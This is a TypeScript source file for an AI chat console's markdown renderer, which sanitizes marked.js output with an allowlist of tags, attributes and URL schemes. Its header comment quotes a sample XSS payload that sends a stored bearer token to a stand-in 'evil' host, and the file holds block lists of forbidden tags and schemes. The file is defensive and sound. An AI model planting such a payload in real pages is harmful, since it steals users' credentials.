/**
 * Markdown rendering utility using marked.js
 *
 * SECURITY: assistant messages routinely echo attacker-influenced text
 * (inbound SMS/email bodies, lead/contact names, scraped Zillow/MLS listing
 * descriptions). marked() emits raw HTML for any inline HTML in the source, so
 * its output MUST be sanitized before it reaches dangerouslySetInnerHTML in
 * ChatMessage/StreamingMessage, otherwise a payload like
 *   <img src=x onerror="fetch('https://evil/?t='+localStorage.jarvis_token)">
 * runs in Joseph's authenticated console and can exfiltrate the bearer token.
 *
 * We use a dependency-free, allowlist DOM sanitizer (sanitizeHtml below)
 * applied AFTER postProcessHtml (the report-card step) so the report cards we
 * synthesize survive but all script/iframe/event-handler/javascript: vectors
 * are stripped. Parsing happens inside an inert <template> whose content
 * belongs to a document with no browsing context, so no resource fetch or
 * event handler fires while we sanitize.
 */

import { initLexer } from './markdown-lexer';

let marked: ((src: string) => string) | null = null;
const WORKSPACE_IMAGE_PREFIX = '/opt/jarvis-unified/workspace/';
// A table column is numeric when every filled body cell reads as an amount, a count, a percent or a ratio.
const NUMERIC_CELL = /^[\s(+\-\u2212]*[$\u20ac\u00a3]?\s*\d[\d,]*(?:\.\d+)?\s*(?:%|[kKmMbB]|x)?\)?\s*$/;

// ---- HTML sanitizer (allowlist, dependency-free) ----

// Tags we allow to render. Everything else is unwrapped (children kept as
// text/markup) or, for dangerous embedders, dropped entirely.
const ALLOWED_TAGS = new Set([
  'a', 'b', 'i', 'em', 'strong', 'del', 's', 'code', 'pre', 'kbd', 'samp',
  'br', 'hr', 'p', 'span', 'div', 'blockquote',
  'ul', 'ol', 'li', 'dl', 'dt', 'dd',
  'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
  'table', 'thead', 'tbody', 'tfoot', 'tr', 'th', 'td',
  'img', 'sup', 'sub',
]);

// Tags whose entire subtree is removed (never just unwrapped) because their
// content is executable or an exfiltration vector.
const FORBIDDEN_TAGS = new Set([
  'script', 'style', 'iframe', 'object', 'embed', 'link', 'meta', 'base',
  'form', 'input', 'button', 'textarea', 'select', 'option', 'noscript',
  'template', 'svg', 'math', 'audio', 'video', 'source', 'track', 'frame',
  'frameset', 'applet', 'param',
]);

// Per-tag attribute allowlist. Anything not listed (and any on* handler) is
// stripped. Class is allowed broadly so our report-card / code styling works.
const ALLOWED_ATTR: Record<string, Set<string>> = {
  a: new Set(['href', 'title', 'target', 'rel', 'class']),
  img: new Set(['src', 'alt', 'title', 'width', 'height', 'class', 'loading']),
  code: new Set(['class']),
  pre: new Set(['class']),
  span: new Set(['class']),
  div: new Set(['class']),
  th: new Set(['class', 'colspan', 'rowspan', 'align']),
  td: new Set(['class', 'colspan', 'rowspan', 'align']),
};
const GLOBAL_ALLOWED_ATTR = new Set(['class']);

// URL-bearing attributes that must be checked for dangerous schemes.
const URL_ATTRS = new Set(['href', 'src']);

// Matches ASCII control chars (0x00-0x1F), space (0x20) and DEL (0x7F).
// Built from char codes so the source contains no literal control bytes.
// Strips whitespace/control-char obfuscation before scheme comparison
// (e.g. "java\tscript:", "java\nscript:") so a dangerous scheme can't hide.
const URL_NOISE_RE = new RegExp(`[\\x00-\\x20\\x7f]+`, 'g');

const DANGEROUS_SCHEMES = ['javascript:', 'vbscript:', 'data:', 'blob:', 'file:'];

function isSafeUrl(value: string): boolean {
  const stripped = value.replace(URL_NOISE_RE, '').toLowerCase();
  return !DANGEROUS_SCHEMES.some((scheme) => stripped.startsWith(scheme));
}

function sanitizeElement(el: Element): void {
  // Strip every attribute that is not explicitly allowed, plus enforce safe
  // URLs and harden link targets.
  const tag = el.tagName.toLowerCase();
  const perTag = ALLOWED_ATTR[tag];
  for (const attr of Array.from(el.attributes)) {
    const name = attr.name.toLowerCase();
    const allowed =
      GLOBAL_ALLOWED_ATTR.has(name) || (perTag ? perTag.has(name) : false);
    if (name.startsWith('on') || !allowed) {
      el.removeAttribute(attr.name);
      continue;
    }
    if (URL_ATTRS.has(name) && !isSafeUrl(attr.value)) {
      el.removeAttribute(attr.name);
    }
  }
  // Harden any surviving links so they can't reach window.opener.
  if (tag === 'a' && el.hasAttribute('href')) {
    el.setAttribute('target', '_blank');
    el.setAttribute('rel', 'noopener noreferrer');
  }
}

function sanitizeNode(node: Node): void {
  // Walk children first so removals/unwraps don't skip siblings.
  const children = Array.from(node.childNodes);
  for (const child of children) {
    if (child.nodeType === 3 /* TEXT_NODE */) continue;
    if (child.nodeType !== 1 /* ELEMENT_NODE */) {
      // Comments, processing instructions, etc. — drop.
      child.parentNode?.removeChild(child);
      continue;
    }
    const el = child as Element;
    const tag = el.tagName.toLowerCase();

    if (FORBIDDEN_TAGS.has(tag)) {
      el.parentNode?.removeChild(el);
      continue;
    }

    if (!ALLOWED_TAGS.has(tag)) {
      // Unknown but not dangerous: recurse, then unwrap (keep text content).
      sanitizeNode(el);
      const parent = el.parentNode;
      if (parent) {
        while (el.firstChild) parent.insertBefore(el.firstChild, el);
        parent.removeChild(el);
      }
      continue;
    }

    sanitizeElement(el);
    sanitizeNode(el);
  }
}

/**
 * Sanitize an HTML string against the allowlist above. Falls back to escaping
 * when no DOM parser is available (SSR / non-browser test env without jsdom).
 */
export function sanitizeHtml(html: string): string {
  if (typeof document === 'undefined' || typeof document.createElement !== 'function') {
    // No DOM (SSR / worker) — fail safe by escaping.
    return escapeHtml(html);
  }
  const template = document.createElement('template');
  // Inert parse: template.content lives in a document with no browsing
  // context, so images/scripts don't load or execute during assignment.
  template.innerHTML = html;
  sanitizeNode(template.content);
  return template.innerHTML;
}

/**
 * Chat-only upgrades applied after sanitizing (fd-rich-chat PH-01): tables scroll sideways inside a wrapper and
 * number columns carry `num`; a picture saved in the workspace moves its path to data-workspace-src, so the
 * browser never requests the bare path and the chat loads it through the signed file route instead.
 */
function enhanceHtml(html: string): string {
  if (typeof document === 'undefined' || typeof document.createElement !== 'function') return html;
  const template = document.createElement('template');
  template.innerHTML = html;
  const root = template.content;
  for (const table of Array.from(root.querySelectorAll('table'))) {
    const wrap = document.createElement('div');
    wrap.className = 'md-table-wrap';
    table.parentNode?.insertBefore(wrap, table);
    wrap.appendChild(table);
    const bodyRows = Array.from(table.querySelectorAll('tbody tr'));
    const columns = Math.max(0, ...bodyRows.map((row) => row.children.length));
    for (let col = 0; col < columns; col++) {
      const cells = bodyRows.map((row) => row.children[col]).filter(Boolean) as Element[];
      const filled = cells.map((cell) => (cell.textContent || '').trim()).filter((text) => text !== '');
      if (filled.length === 0 || !filled.every((text) => NUMERIC_CELL.test(text))) continue;
      for (const cell of cells) cell.classList.add('num');
      table.querySelectorAll('thead tr').forEach((row) => row.children[col]?.classList.add('num'));
    }
  }
  for (const img of Array.from(root.querySelectorAll('img[src]'))) {
    let src = img.getAttribute('src') || '';
    try {
      src = decodeURI(src);
    } catch {
      // Keep the raw value; a malformed escape is simply not a workspace path below.
    }
    if (!src.startsWith(WORKSPACE_IMAGE_PREFIX) || src.split('/').includes('..')) continue;
    img.removeAttribute('src');
    img.setAttribute('data-workspace-src', src);
    img.classList.add('md-ws-img');
  }
  return template.innerHTML;
}

function postProcessHtml(html: string): string {
  return html.replace(
    /<a\s+href="(https:\/\/jarvis\.janiczekgroup\.com\/api\/reports\/([A-Za-z0-9]{12,16})(?:\/[^"]*)?)"[^>]*>[\s\S]*?<\/a>/g,
    (_match, fullUrl, reportId) => {
      const pdfUrl = `https://jarvis.janiczekgroup.com/api/reports/${reportId}/report.pdf`;
      return `<div class="report-card">` +
        `<span class="report-card-title">Report ${reportId}</span>` +
        `<div class="report-card-actions">` +
        `<a href="${fullUrl}" target="_blank" rel="noopener" class="report-card-btn report-card-btn-primary">View Report</a>` +
        `<a href="${pdfUrl}" target="_blank" rel="noopener" class="report-card-btn report-card-btn-secondary">Download PDF</a>` +
        `</div></div>`;
    },
  );
}

async function loadMarked() {
  if (!marked) {
    const mod = await import('marked');
    const instance = new mod.Marked();
    instance.setOptions({
      breaks: true,
      gfm: true,
    });

    const renderer = new mod.Renderer();
    renderer.code = ({ text, lang }: { text: string; lang?: string }) => {
      const langClass = lang ? ` class="language-${escapeHtml(lang)}"` : '';
      return `<pre><code${langClass}>${escapeHtml(text)}</code></pre>`;
    };
    instance.use({ renderer });

    // SECURITY: sanitize AFTER postProcessHtml so our report cards survive but
    // any inline HTML from attacker-influenced source text is neutralized.
    marked = (src: string) =>
      enhanceHtml(sanitizeHtml(postProcessHtml(instance.parse(src) as string)));
  }
  await initLexer();
  return marked;
}

let _cachedMarked: ((src: string) => string) | null = null;

export function renderMarkdown(text: string): string {
  if (_cachedMarked) {
    return _cachedMarked(text);
  }
  loadMarked().then((m) => { _cachedMarked = m; });
  return escapeHtml(text);
}

export async function initMarkdown() {
  const m = await loadMarked();
  _cachedMarked = m;
}

export function escapeHtml(str: string): string {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}
